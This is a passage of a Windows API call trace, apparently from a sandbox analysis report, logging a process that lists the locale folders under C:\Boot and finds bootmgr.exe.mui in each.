ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.309] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.309] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.310] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.310] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0039.310] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.310] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.310] CoTaskMemFree (pv=0x4fe370) [0039.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.310] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0039.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.310] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0039.310] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0039.310] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.310] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.311] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.311] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.311] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.311] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.311] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0039.311] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0039.311] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.311] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.311] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.312] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.312] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0039.312] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.312] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.312] CoTaskMemFree (pv=0x4fe370) [0039.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0039.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0039.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0039.312] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.318] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.318] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.318] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.318] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.319] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.319] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0039.319] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0039.319] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.319] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.319] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.319] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.319] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.319] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0039.320] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.320] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.320] CoTaskMemFree (pv=0x4fe370) [0039.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.320] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0039.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.320] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0039.320] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0039.320] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.320] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.320] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.321] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.321] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.321] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.321] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0039.321] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0039.321] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.321] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.321] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.321] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.322] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.322] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0039.322] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.322] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.322] CoTaskMemFree (pv=0x4fe370) [0039.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.322] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0039.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.322] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0039.322] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0039.322] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 